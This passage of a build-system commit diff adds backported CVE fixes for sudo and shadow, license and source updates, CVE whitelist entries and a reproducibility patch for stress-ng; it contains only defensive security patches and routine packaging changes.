 LIC_FILES_CHKSUM = "file://login.defs_shadow-sysroot;md5=25e2f2de4dfc8f966ac5cdfce45cd7d5"
 
 DEPENDS = "base-passwd"
diff --git a/meta/recipes-extended/shadow/shadow.inc b/meta/recipes-extended/shadow/shadow.inc
index f86e5e03c0..c16292c38a 100644
--- a/meta/recipes-extended/shadow/shadow.inc
+++ b/meta/recipes-extended/shadow/shadow.inc
@@ -1,8 +1,9 @@
 SUMMARY = "Tools to change and administer password and group data"
 HOMEPAGE = "http://github.com/shadow-maint/shadow"
+DESCRIPTION = "${SUMMARY}"
 BUGTRACKER = "http://github.com/shadow-maint/shadow/issues"
 SECTION = "base/utils"
-LICENSE = "BSD | Artistic-1.0"
+LICENSE = "BSD-3-Clause | Artistic-1.0"
 LIC_FILES_CHKSUM = "file://COPYING;md5=ed80ff1c2b40843cf5768e5229cf16e5 \
                     file://src/passwd.c;beginline=2;endline=30;md5=5720ff729a6ff39ecc9f64555d75f4af"
 
@@ -13,6 +14,9 @@ SRC_URI = "https://github.com/shadow-maint/shadow/releases/download/${PV}/${BP}.
            file://shadow-4.1.3-dots-in-usernames.patch \
            ${@bb.utils.contains('PACKAGECONFIG', 'pam', '${PAM_SRC_URI}', '', d)} \
            file://shadow-relaxed-usernames.patch \
+           file://CVE-2023-29383.patch \
+           file://0001-Overhaul-valid_field.patch \
+           file://CVE-2023-4641.patch \
            "
 
 SRC_URI_append_class-target = " \
diff --git a/meta/recipes-extended/shadow/shadow_4.8.1.bb b/meta/recipes-extended/shadow/shadow_4.8.1.bb
index c975395ff8..9dfcd4bc10 100644
--- a/meta/recipes-extended/shadow/shadow_4.8.1.bb
+++ b/meta/recipes-extended/shadow/shadow_4.8.1.bb
@@ -6,5 +6,10 @@ BUILD_LDFLAGS_append_class-target = " ${@bb.utils.contains('DISTRO_FEATURES', 'p
 
 BBCLASSEXTEND = "native nativesdk"
 
+# Severity is low and marked as closed and won't fix.
+# https://bugzilla.redhat.com/show_bug.cgi?id=884658
+CVE_CHECK_WHITELIST += "CVE-2013-4235"
 
+# This is an issue for a different shadow
+CVE_CHECK_WHITELIST += "CVE-2016-15024"
 
diff --git a/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
new file mode 100644
index 0000000000..9dfca0441b
--- /dev/null
+++ b/meta/recipes-extended/stress-ng/stress-ng/0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch
@@ -0,0 +1,26 @@
+From 2386cd8f907b379ae5cc1ce2888abef7d30e709a Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex@linutronix.de>
+Date: Sat, 23 Oct 2021 20:20:59 +0200
+Subject: [PATCH] Makefile: do not write the timestamp into compressed manpage.
+
+This helps reproducibility.
+
+Upstream-Status: Submitted [https://github.com/ColinIanKing/stress-ng/pull/156]
+Signed-off-by: Alexander Kanavin <alex@linutronix.de>
+---
+ Makefile | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile b/Makefile
+index 886018f9..f4290f9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -412,7 +412,7 @@ git-commit-id.h:
+ $(OBJS): stress-ng.h Makefile
+ 
+ stress-ng.1.gz: stress-ng.1
+-	gzip -c $< > $@
++	gzip -n -c $< > $@
+ 
+ .PHONY: dist
+ dist:
diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
index 9b987c7bde..cf94e0275b 100644
--- a/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
+++ b/meta/recipes-extended/stress-ng/stress-ng_0.11.17.bb
@@ -5,11 +5,12 @@ HOMEPAGE = "https://kernel.ubuntu.com/~cking/stress-ng/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "https://kernel.ubuntu.com/~cking/tarballs/${BPN}/${BP}.tar.xz \
+SRC_URI = "git://github.com/ColinIanKing/stress-ng.git;protocol=https;branch=master \
            file://0001-Do-not-preserve-ownership-when-installing-example-jo.patch \
+           file://0001-Makefile-do-not-write-the-timestamp-into-compressed-.patch \
            "
-SRC_URI[md5sum] = "7b89157c838f2bb4bdeba8f46e3c56ae"
-SRC_URI[sha256sum] = "860291dd3a18b985b3483190a627bbede2b5c52113766c1921001b3fb4b83af0"
+SRCREV = "e045bcd711178c11b7e797ef6b4c524658468596"
+S = "${WORKDIR}/git"
 
 DEPENDS = "coreutils-native"
 
diff --git a/meta/recipes-extended/sudo/files/CVE-2023-22809.patch b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
new file mode 100644
index 0000000000..6c47eb3e44
--- /dev/null
+++ b/meta/recipes-extended/sudo/files/CVE-2023-22809.patch
@@ -0,0 +1,113 @@
+Backport of:
+
+# HG changeset patch
+# Parent  7275148cad1f8cd3c350026460acc4d6ad349c3a
+sudoedit: do not permit editor arguments to include "--"
+We use "--" to separate the editor and arguments from the files to edit.
+If the editor arguments include "--", sudo can be tricked into allowing
+the user to edit a file not permitted by the security policy.
+Thanks to Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com) for finding this bug.
+
+CVE: CVE-2023-22809
+Upstream-Staus: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.8.31-1ubuntu1.4.debian.tar.xz]
+Signed-off-by: Omkar Patil <omkar.patil@kpit.com>
+
+--- a/plugins/sudoers/editor.c
++++ b/plugins/sudoers/editor.c
+@@ -56,7 +56,7 @@ resolve_editor(const char *ed, size_t ed
+     const char *cp, *ep, *tmp;
+     const char *edend = ed + edlen;
+     struct stat user_editor_sb;
+-    int nargc;
++    int nargc = 0;
+     debug_decl(resolve_editor, SUDOERS_DEBUG_UTIL)
+ 
+     /*
+@@ -102,6 +102,21 @@ resolve_editor(const char *ed, size_t ed
+ 	    free(editor_path);
+ 	    while (nargc--)
+ 		free(nargv[nargc]);
++	    free(nargv);
++	    debug_return_str(NULL);
++	}
++
++	/*
++	 * We use "--" to separate the editor and arguments from the files
++	 * to edit.  The editor arguments themselves may not contain "--".
++	 */
++	if (strcmp(nargv[nargc], "--") == 0) {
++	    sudo_warnx(U_("ignoring editor: %.*s"), (int)edlen, ed);
++	    sudo_warnx("%s", U_("editor arguments may not contain \"--\""));
++	    errno = EINVAL;
++	    free(editor_path);
++	    while (nargc--)
++		free(nargv[nargc]);
+ 	    free(nargv);
+ 	    debug_return_str(NULL);
+ 	}
+--- a/plugins/sudoers/sudoers.c
++++ b/plugins/sudoers/sudoers.c
+@@ -616,20 +616,31 @@ sudoers_policy_main(int argc, char * con
+ 
+     /* Note: must call audit before uid change. */
+     if (ISSET(sudo_mode, MODE_EDIT)) {
++	const char *env_editor = NULL;
+ 	int edit_argc;
+-	const char *env_editor;
+ 
+ 	free(safe_cmnd);
+ 	safe_cmnd = find_editor(NewArgc - 1, NewArgv + 1, &edit_argc,
+ 	    &edit_argv, NULL, &env_editor, false);
+ 	if (safe_cmnd == NULL) {
+-	    if (errno != ENOENT)
++	    switch (errno) {
++	    case ENOENT:
++		audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
++		    env_editor ? env_editor : def_editor);
++		sudo_warnx(U_("%s: command not found"),
++		    env_editor ? env_editor : def_editor);
++		goto bad;
++	    case EINVAL:
++		if (def_env_editor && env_editor != NULL) {
++		    /* User tried to do something funny with the editor. */
++		    log_warningx(SLOG_NO_STDERR|SLOG_SEND_MAIL,
++			"invalid user-specified editor: %s", env_editor);
++		    goto bad;
++		}
++		/* FALLTHROUGH */
++	    default:
+ 		goto done;
+-	    audit_failure(NewArgc, NewArgv, N_("%s: command not found"),
+-		env_editor ? env_editor : def_editor);
+-	    sudo_warnx(U_("%s: command not found"),
+-		env_editor ? env_editor : def_editor);
+-	    goto bad;
++	    }
+ 	}
+ 	if (audit_success(edit_argc, edit_argv) != 0 && !def_ignore_audit_errors)
+ 	    goto done;
+--- a/plugins/sudoers/visudo.c
++++ b/plugins/sudoers/visudo.c
+@@ -308,7 +308,7 @@ static char *
+ get_editor(int *editor_argc, char ***editor_argv)
+ {
+     char *editor_path = NULL, **whitelist = NULL;
+-    const char *env_editor;
++    const char *env_editor = NULL;
+     static char *files[] = { "+1", "sudoers" };
+     unsigned int whitelist_len = 0;
+     debug_decl(get_editor, SUDOERS_DEBUG_UTIL)
+@@ -342,7 +342,11 @@ get_editor(int *editor_argc, char ***edi
+     if (editor_path == NULL) {
+ 	if (def_env_editor && env_editor != NULL) {
+ 	    /* We are honoring $EDITOR so this is a fatal error. */
+-	    sudo_fatalx(U_("specified editor (%s) doesn't exist"), env_editor);
++	    if (errno == ENOENT) {
++		sudo_warnx(U_("specified editor (%s) doesn't exist"),
++		    env_editor);
++	    }
++	    exit(EXIT_FAILURE);
+ 	}
+ 	sudo_fatalx(U_("no editor found (editor path = %s)"), def_editor);
+     }
diff --git a/meta/recipes-extended/sudo/sudo.inc b/meta/recipes-extended/sudo/sudo.inc
index 5d27d46928..9c7279d25a 100644
--- a/meta/recipes-extended/sudo/sudo.inc
+++ b/meta/recipes-extended/sudo/sudo.inc
@@ -3,8 +3,8 @@ DESCRIPTION = "Sudo (superuser do) allows a system administrator to give certain
 HOMEPAGE = "http://www.sudo.ws"
 BUGTRACKER = "http://www.sudo.ws/bugs/"
 SECTION = "admin"
-LICENSE = "ISC & BSD & Zlib"
-LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=4d1b44b1576eea036d78b8cc961aa93d \
+LICENSE = "ISC & BSD-3-Clause & BSD-2-Clause & Zlib"
+LIC_FILES_CHKSUM = "file://doc/LICENSE;md5=07966675feaddba70cc812895b248230 \
                     file://plugins/sudoers/redblack.c;beginline=1;endline=46;md5=03e35317699ba00b496251e0dfe9f109 \
                     file://lib/util/reallocarray.c;beginline=3;endline=15;md5=397dd45c7683e90b9f8bf24638cf03bf \
                     file://lib/util/fnmatch.c;beginline=3;endline=27;md5=004d7d2866ba1f5b41174906849d2e0f \
@@ -49,3 +49,5 @@ do_compile_prepend () {
 do_install_prepend (){
 	mkdir -p ${D}/${localstatedir}/lib
 }
+
+CVE_VERSION_SUFFIX = "patch"
diff --git a/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
new file mode 100644
index 0000000000..6ee2d5c11e
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/0001-Fix-includes-when-building-with-musl.patch
@@ -0,0 +1,29 @@
+From f4e9e4337f8844d199515ff2b762c914dd254cbd Mon Sep 17 00:00:00 2001
+From: Dan Robertson <dan@dlrobertson.com>
+Date: Sat, 16 May 2020 00:12:44 +0000
+Subject: [PATCH] Fix includes when building with musl
+
+Include sys/types.h for mode_t and id_t in sudo_debug.h
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/f4e9e4337f8844d199515ff2b762c914dd254cbd]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ include/sudo_debug.h | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/include/sudo_debug.h b/include/sudo_debug.h
+index 180f2096f..0124b0b19 100644
+--- a/include/sudo_debug.h
++++ b/include/sudo_debug.h
+@@ -25,6 +25,7 @@
+ #else
+ # include "compat/stdbool.h"
+ #endif
++#include <sys/types.h>
+ #include "sudo_queue.h"
+ 
+ /*
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
new file mode 100644
index 0000000000..1336c7701d
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2022-43995.patch
@@ -0,0 +1,59 @@
+From e1554d7996a59bf69544f3d8dd4ae683027948f9 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 15 Nov 2022 09:17:18 +0530
+Subject: [PATCH] CVE-2022-43995
+
+Upstream-Status: Backport [https://github.com/sudo-project/sudo/commit/bd209b9f16fcd1270c13db27ae3329c677d48050]
+CVE: CVE-2022-43995
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Potential heap overflow for passwords < 8
+characters. Starting with sudo 1.8.0 the plaintext password buffer is
+dynamically sized so it is not safe to assume that it is at least 9 bytes in
+size.
+Found by Hugo Lefeuvre (University of Manchester) with ConfFuzz.
+---
+ plugins/sudoers/auth/passwd.c | 11 +++++------
+ 1 file changed, 5 insertions(+), 6 deletions(-)
+
+diff --git a/plugins/sudoers/auth/passwd.c b/plugins/sudoers/auth/passwd.c
+index 03c7a16..76a7824 100644
+--- a/plugins/sudoers/auth/passwd.c
++++ b/plugins/sudoers/auth/passwd.c
+@@ -63,7 +63,7 @@ sudo_passwd_init(struct passwd *pw, sudo_auth *auth)
+ int
+ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_conv_callback *callback)
+ {
+-    char sav, *epass;
++    char des_pass[9], *epass;
+     char *pw_epasswd = auth->data;
+     size_t pw_len;
+     int matched = 0;
+@@ -75,12 +75,12 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+ 
+     /*
+      * Truncate to 8 chars if standard DES since not all crypt()'s do this.
+-     * If this turns out not to be safe we will have to use OS #ifdef's (sigh).
+      */
+-    sav = pass[8];
+     pw_len = strlen(pw_epasswd);
+-    if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len))
+-	pass[8] = '\0';
++    if (pw_len == DESLEN || HAS_AGEINFO(pw_epasswd, pw_len)) {
++	strlcpy(des_pass, pass, sizeof(des_pass));
++	pass = des_pass;
++    }
+ 
+     /*
+      * Normal UN*X password check.
+@@ -88,7 +88,6 @@ sudo_passwd_verify(struct passwd *pw, char *pass, sudo_auth *auth, struct sudo_c
+      * only compare the first DESLEN characters in that case.
+      */
+     epass = (char *) crypt(pass, pw_epasswd);
+-    pass[8] = sav;
+     if (epass != NULL) {
+ 	if (HAS_AGEINFO(pw_epasswd, pw_len) && strlen(epass) == DESLEN)
+ 	    matched = !strncmp(pw_epasswd, epass, DESLEN);
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
new file mode 100644
index 0000000000..bc6f8c19a6
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-1.patch
@@ -0,0 +1,646 @@
+Origin: Backport obtained from SUSE. Thanks!
+
+From 334daf92b31b79ce68ed75e2ee14fca265f029ca Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Wed, 18 Jan 2023 08:21:34 -0700
+Subject: [PATCH] Escape control characters in log messages and "sudoreplay -l"
+ output. The log message contains user-controlled strings that could include
+ things like terminal control characters.  Space characters in the command
+ path are now also escaped.
+
+Command line arguments that contain spaces are surrounded with
+single quotes and any literal single quote or backslash characters
+are escaped with a backslash.  This makes it possible to distinguish
+multiple command line arguments from a single argument that contains
+spaces.
+
+Issue found by Matthieu Barjole and Victor Cutillas of Synacktiv
+(https://synacktiv.com).
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-1.patch?h=ubuntu/focal-security
+Upstream commit  https://github.com/sudo-project/sudo/commit/334daf92b31b79ce68ed75e2ee14fca265f029ca]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ doc/sudoers.man.in           |   33 +++++++--
+ doc/sudoers.mdoc.in          |   28 ++++++--
+ doc/sudoreplay.man.in        |    9 ++
+ doc/sudoreplay.mdoc.in       |   10 ++
+ include/sudo_compat.h        |    6 +
+ include/sudo_lbuf.h          |    7 ++
+ lib/util/lbuf.c              |  106 +++++++++++++++++++++++++++++++
+ lib/util/util.exp.in         |    1 
+ plugins/sudoers/logging.c    |  145 +++++++++++--------------------------------
+ plugins/sudoers/sudoreplay.c |   44 +++++++++----
+ 10 files changed, 257 insertions(+), 132 deletions(-)
+
+--- a/doc/sudoers.man.in
++++ b/doc/sudoers.man.in
+@@ -4566,6 +4566,19 @@ can log events using either
+ syslog(3)
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is stored as
++\(oq#011\(cq
++and an embedded carriage return is stored as
++\(oq#015\(cq.
++In addition, space characters in the command path are stored as
++\(oq#040\(cq.
++Literal single quotes and backslash characters
++(\(oq\e\(cq)
++in command line arguments are escaped with a backslash.
+ .SS "Accepted command log entries"
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4646,7 +4659,7 @@ A list of environment variables specifie
+ if specified.
+ .TP 14n
+ command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .PP
+ Messages are logged using the locale specified by
+ \fIsudoers_locale\fR,
+@@ -4882,17 +4895,21 @@ with a few important differences:
+ 1.\&
+ The
+ \fIprogname\fR
+-and
+-\fIhostname\fR
+-fields are not present.
++field is not present.
+ .TP 5n
+ 2.\&
+-If the
+-\fIlog_year\fR
+-option is enabled,
+-the date will also include the year.
++The
++\fIhostname\fR
++is only logged if the
++\fIlog_host\fR
++option is enabled.
+ .TP 5n
+ 3.\&
++The date does not include the year unless the
++\fIlog_year\fR
++option is enabled.
++.TP 5n
++4.\&
+ Lines that are longer than
+ \fIloglinelen\fR
+ characters (80 by default) are word-wrapped and continued on the
+--- a/doc/sudoers.mdoc.in
++++ b/doc/sudoers.mdoc.in
+@@ -4261,6 +4261,19 @@ can log events using either
+ .Xr syslog 3
+ or a simple log file.
+ The log format is almost identical in both cases.
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is stored as
++.Ql #011
++and an embedded carriage return is stored as
++.Ql #015 .
++In addition, space characters in the command path are stored as
++.Ql #040 .
++Literal single quotes and backslash characters
++.Pq Ql \e
++in command line arguments are escaped with a backslash.
+ .Ss Accepted command log entries
+ Commands that sudo runs are logged using the following format (split
+ into multiple lines for readability):
+@@ -4328,7 +4341,7 @@ option is enabled.
+ A list of environment variables specified on the command line,
+ if specified.
+ .It command
+-The actual command that was executed.
++The actual command that was executed, including any command line arguments.
+ .El
+ .Pp
+ Messages are logged using the locale specified by
+@@ -4550,14 +4563,17 @@ with a few important differences:
+ .It
+ The
+ .Em progname
+-and
++field is not present.
++.It
++The
+ .Em hostname
+-fields are not present.
++is only logged if the
++.Em log_host
++option is enabled.
+ .It
+-If the
++The date does not include the year unless the
+ .Em log_year
+-option is enabled,
+-the date will also include the year.
++option is enabled.
+ .It
+ Lines that are longer than
+ .Em loglinelen
+--- a/doc/sudoreplay.man.in
++++ b/doc/sudoreplay.man.in
+@@ -149,6 +149,15 @@ In this mode,
+ will list available sessions in a format similar to the
+ \fBsudo\fR
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formated in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is displayed as
++\(oq#011\(cq
++and an embedded carriage return is displayed as
++\(oq#015\(cq.
++.sp
+ If a
+ \fIsearch expression\fR
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/doc/sudoreplay.mdoc.in
++++ b/doc/sudoreplay.mdoc.in
+@@ -142,6 +142,16 @@ In this mode,
+ will list available sessions in a format similar to the
+ .Nm sudo
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is displayed as
++.Ql #011
++and an embedded carriage return is displayed as
++.Ql #015 .
++Space characters in the command name and arguments are also formatted in octal.
++.Pp
+ If a
+ .Ar search expression
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/include/sudo_compat.h
++++ b/include/sudo_compat.h
+@@ -79,6 +79,12 @@
+ # endif
+ #endif
+ 
++#ifdef HAVE_FALLTHROUGH_ATTRIBUTE
++# define FALLTHROUGH 	__attribute__((__fallthrough__))
++#else
++# define FALLTHROUGH 	do { } while (0)
++#endif
++
+ /*
+  * Given the pointer x to the member m of the struct s, return
+  * a pointer to the containing structure.
+--- a/include/sudo_lbuf.h
++++ b/include/sudo_lbuf.h
+@@ -36,9 +36,15 @@ struct sudo_lbuf {
+ 
+ typedef int (*sudo_lbuf_output_t)(const char *);
+ 
++/* Flags for sudo_lbuf_append_esc() */
++#define LBUF_ESC_CNTRL	0x01
++#define LBUF_ESC_BLANK	0x02
++#define LBUF_ESC_QUOTE	0x04
++
+ __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols);
+ __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3);
++__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4);
+ __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4);
+ __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf);
+@@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1(
+ #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e))
+ #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a))
+ #define sudo_lbuf_append sudo_lbuf_append_v1
++#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1
+ #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1
+ #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a))
+ #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a))
+--- a/lib/util/lbuf.c
++++ b/lib/util/lbuf.c
+@@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf,
+ }
+ 
+ /*
++ * Escape a character in octal form (#0n) and store it as a string
++ * in buf, which must have at least 6 bytes available.
++ * Returns the length of buf, not counting the terminating NUL byte.
++ */
++static int
++escape(unsigned char ch, char *buf)
++{
++    const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5;
++
++    /* Work backwards from the least significant digit to most significant. */
++    switch (len) {
++    case 5:
++	buf[4] = (ch & 7) + '0';
++	ch >>= 3;
++	FALLTHROUGH;
++    case 4:
++	buf[3] = (ch & 7) + '0';
++	ch >>= 3;
++	FALLTHROUGH;
++    case 3:
++	buf[2] = (ch & 7) + '0';
++	buf[1] = '0';
++	buf[0] = '#';
++	break;
++    }
++    buf[len] = '\0';
++
++    return len;
++}
++
++/*
++ * Parse the format and append strings, only %s and %% escapes are supported.
++ * Any non-printable characters are escaped in octal as #0nn.
++ */
++bool
++sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...)
++{
++    unsigned int saved_len = lbuf->len;
++    bool ret = false;
++    const char *s;
++    va_list ap;
++    debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL);
++
++    if (sudo_lbuf_error(lbuf))
++	debug_return_bool(false);
++
++#define should_escape(ch) \
++    ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \
++    (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch)))
++#define should_quote(ch) \
++    (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\'))
++
++    va_start(ap, fmt);
++    while (*fmt != '\0') {
++	if (fmt[0] == '%' && fmt[1] == 's') {
++	    if ((s = va_arg(ap, char *)) == NULL)
++		s = "(NULL)";
++	    while (*s != '\0') {
++		if (should_escape(*s)) {
++		    if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++			goto done;
++		    lbuf->len += escape(*s++, lbuf->buf + lbuf->len);
++		    continue;
++		}
++		if (should_quote(*s)) {
++		    if (!sudo_lbuf_expand(lbuf, 2))
++			goto done;
++		    lbuf->buf[lbuf->len++] = '\\';
++		    lbuf->buf[lbuf->len++] = *s++;
++		    continue;
++		}
++		if (!sudo_lbuf_expand(lbuf, 1))
++		    goto done;
++		lbuf->buf[lbuf->len++] = *s++;
++	    }
++	    fmt += 2;
++	    continue;
++	}
++	if (should_escape(*fmt)) {
++	    if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++		goto done;
++	    if (*fmt == '\'') {
++		lbuf->buf[lbuf->len++] = '\\';
++		lbuf->buf[lbuf->len++] = *fmt++;
++	    } else {
++		lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len);
++	    }
++	    continue;
++	}
++	if (!sudo_lbuf_expand(lbuf, 1))
++	    goto done;
++	lbuf->buf[lbuf->len++] = *fmt++;
++    }
++    ret = true;
++
++done:
++    if (!ret)
++	lbuf->len = saved_len;
++    if (lbuf->size != 0)
++	lbuf->buf[lbuf->len] = '\0';
++    va_end(ap);
++
++    debug_return_bool(ret);
++}
++
++/*
+  * Parse the format and append strings, only %s and %% escapes are supported.
+  * Any characters in set are quoted with a backslash.
+  */
+--- a/lib/util/util.exp.in
++++ b/lib/util/util.exp.in
+@@ -79,6 +79,7 @@ sudo_gethostname_v1
+ sudo_gettime_awake_v1
+ sudo_gettime_mono_v1
+ sudo_gettime_real_v1
++sudo_lbuf_append_esc_v1
+ sudo_lbuf_append_quoted_v1
+ sudo_lbuf_append_v1
+ sudo_lbuf_clearerr_v1
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -58,6 +58,7 @@
+ #include <syslog.h>
+ 
+ #include "sudoers.h"
++#include "sudo_lbuf.h"
+ 
+ #ifndef HAVE_GETADDRINFO
+ # include "compat/getaddrinfo.h"
+@@ -940,14 +941,6 @@ should_mail(int status)
+ 	(def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS)));
+ }
+ 
+-#define	LL_TTY_STR	"TTY="
+-#define	LL_CWD_STR	"PWD="		/* XXX - should be CWD= */
+-#define	LL_USER_STR	"USER="
+-#define	LL_GROUP_STR	"GROUP="
+-#define	LL_ENV_STR	"ENV="
+-#define	LL_CMND_STR	"COMMAND="
+-#define	LL_TSID_STR	"TSID="
+-
+ #define IS_SESSID(s) ( \
+     isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \
+     (s)[2] == '/' && \
+@@ -962,14 +955,16 @@ should_mail(int status)
+ static char *
+ new_logline(const char *message, const char *errstr)
+ {
+-    char *line = NULL, *evstr = NULL;
+ #ifndef SUDOERS_NO_SEQ
+     char sessid[7];
+ #endif
+     const char *tsid = NULL;
+-    size_t len = 0;
++    struct sudo_lbuf lbuf;
++    int i;
+     debug_decl(new_logline, SUDOERS_DEBUG_LOGGING)
+ 
++    sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+ #ifndef SUDOERS_NO_SEQ
+     /* A TSID may be a sudoers-style session ID or a free-form string. */
+     if (sudo_user.iolog_file != NULL) {
+@@ -989,119 +984,55 @@ new_logline(const char *message, const c
+ #endif
+ 
+     /*
+-     * Compute line length
++     * Format the log line as an lbuf, escaping control characters in
++     * octal form (#0nn).  Error checking (ENOMEM) is done at the end.
+      */
+-    if (message != NULL)
+-	len += strlen(message) + 3;
+-    if (errstr != NULL)
+-	len += strlen(errstr) + 3;
+-    len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty);
+-    len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd);
+-    if (runas_pw != NULL)
+-	len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name);
+-    if (runas_gr != NULL)
+-	len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name);
+-    if (tsid != NULL)
+-	len += sizeof(LL_TSID_STR) + 2 + strlen(tsid);
+-    if (sudo_user.env_vars != NULL) {
+-	size_t evlen = 0;
+-	char * const *ep;
+-
+-	for (ep = sudo_user.env_vars; *ep != NULL; ep++)
+-	    evlen += strlen(*ep) + 1;
+-	if (evlen != 0) {
+-	    if ((evstr = malloc(evlen)) == NULL)
+-		goto oom;
+-	    evstr[0] = '\0';
+-	    for (ep = sudo_user.env_vars; *ep != NULL; ep++) {
+-		strlcat(evstr, *ep, evlen);
+-		strlcat(evstr, " ", evlen);	/* NOTE: last one will fail */
+-	    }
+-	    len += sizeof(LL_ENV_STR) + 2 + evlen;
+-	}
+-    }
+-    if (user_cmnd != NULL) {
+-	/* Note: we log "sudo -l command arg ..." as "list command arg ..." */
+-	len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd);
+-	if (ISSET(sudo_mode, MODE_CHECK))
+-	    len += sizeof("list ") - 1;
+-	if (user_args != NULL)
+-	    len += strlen(user_args) + 1;
+-    }
+-
+-    /*
+-     * Allocate and build up the line.
+-     */
+-    if ((line = malloc(++len)) == NULL)
+-	goto oom;
+-    line[0] = '\0';
+ 
+     if (message != NULL) {
+-	if (strlcat(line, message, len) >= len ||
+-	    strlcat(line, errstr ? " : " : " ; ", len) >= len)
+-	    goto toobig;
++	sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message,
++	    errstr ? " : " : " ; ");
+     }
+     if (errstr != NULL) {
